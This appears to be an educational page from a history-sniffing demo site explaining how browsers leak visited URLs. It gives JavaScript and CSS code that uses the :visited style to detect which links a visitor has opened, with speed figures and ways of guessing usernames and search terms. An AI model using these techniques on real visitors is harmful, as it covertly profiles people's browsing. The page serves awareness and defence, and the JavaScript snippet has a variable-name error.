The main goal for this website is to educate Internet users about how much and what kind of data can leak from their browsers' history and cache. On this page we aim to provide some technical background about the history sniffing techniques we're using to gather that information. It is important to note (and extremely frightening at the same time) that the techniques themselves have been around for many years and have been successfully used in several more limited scenarios (a full list of references is provided at the bottom of this page).
Implementation
For our current demos, we use two history sniffing techniques -- one for JavaScript and one for CSS -- both utilizing the fact that visited links can have special styles applied to them.JavaScript
The Javascript method is based on the ability to inspect the computed style of
a link (a element) and is the most convenient approach for determining if a
particular URL had been opened in the browser.
We first create a CSS rule for visited links, for example:
<style>
a:visited { color: red; } /* We can also use any other CSS property */
</style>
We can then create elements in Javascript, linking them to URLs from a known list, and then check the color of the elements. For example, the code could look like this:
var url_array = new Array('http://google.com', 'http://yahoo.com');
var visited_array = new Array();
var link_el = document.createElement('a');
var computed_style = document.defaultView.getComputedStyle(link_el, "");
for (var i = 0; i < url_array.length; i++) {
link_el.href = array[i];
if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
// The color was red, so the link was visited
visited_array.push(url_array[i]);
}
}
After all links have been checked, visited_array will contain
all the ones which have been identified as visited in your browser history.
Note that the link element does not have to be added to the DOM, and
therefore doesn't really have to be rendered, meaning that we check
many links very quickly.
CSS
Using the :visited pseudoclass on a elements, it is possible to specify a background-url attribute which will make a request to the server if a particular link has been visited. We can thus achieve the same goal of determining visited links without using Javascript. For example:
<style>
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1">
<a href="http://yahoo.com" id="link2">
If link1 (http://google.com) has been visited, the browser will make a request back to the server to retrieve the background for the #link1 rule. By appending a different URL argument to each rule we can determine which of the links were visited. Please note that this requires no client-side scripting whatsoever, and only relies on the availability of CSS.
Performance
While we're still conducting more accurate measurements, we did want to share some
initial results gathered using a virtual machine on an old dual-core system (likely
much slower than what you have on your desk).
The browsers used for thie test were: IE7, FF3, Opera 9, Safari 3.2 and Chrome 0.9.
Part of the difference between the browsers can be attributed to the fact that some
browsers require slightly different JavaScript (for example, in IE the a
element must first be added to the DOM; not all other browsers have this requirement).
It is easily seen that even the slowest browser (Internet Explorer 7) could check up to 150,000 links a minute. Faster browsers can easily query for over a million links per minute. There are several ways of speeding up the checking process even more (including downloading more links in parallel with the checking process and conducting CSS and Javascript tests concurrently). We will be posting updates soon.
If the number of links which can be checked seems high to you, note that our link checking code has been heavily optimized for each browser to get the best performance in each case.
Gathering links
Of course the Web contains trillions of resources, so even with a very fast computer, it would be impossible to scan all of them. We thus need a way of figuring out which links to check for.
For our tests, we chose different kinds of websites, dividing them into groups, similar to what you can see in the test list on the left of this page. For each website, we gathered a few hundred most popular links from that domain; if it turns out that you've visited one of the main links for that website, your browser will receive all the "secondary" links associated with it. For example, if you've visited http://google.com, our algorithm searches your history for Google Maps, Google News, and many other Google pages. We also crawl some websites completely and gather all available links (for example for our Wikileaks test).
We also monitor a majority of the Net's most popular RSS feeds and constantly look for new links to scan for.(check out the news test to see which of the recent news stories we can detect in your history.
For a few test of social news sites, we've also gathered the links to tens of thousands of user profile pages to see if we can guess your username; see our Digg, Reddit and Slashdot tests.
In addition to all that, we're testing for links to the Google and Bing search results for popular queries: if you've used any of those search engines in the past few months and searched for a hot term such as "michael jackson", chances are that our search engine test will detect it (subject to some limitations).
However, don't be surprised (or relieved) if you've visited websites which aren't showing up on the list -- our goal isn't to give you a complete list of all websites you've visited but rather to show you how much of your history can be viewed in a few seconds by anyone who bothers to look.
Limitations
While the history sniffing techniques we present have a lot of potential to determine your browsing habits, they are (luckily) subject to some limitations. The most important thing to note is that websites can only be detected as visited if they're currently listed in your browser history. If you completely clear your history, nothing can be detected, at least until you start browsing again. Also, if you use different browsers or browser profiles, techniques such as ours can only detect the history in the browser/profile you're currently using.
Depending on your browser and whether you've customized your settings, some websites you visited might be purged from your history after a while (usually after three months, but some browsers, such as Google Chrome, keep them indefinitely). Also, websites opened while in "private browsing" ("porn") mode, will not be shown.
Finally, using the approach we chose, we can't detect if you've individual page components, for example, whether you've seen a particular photo, unless you've visited the direct link for that photo.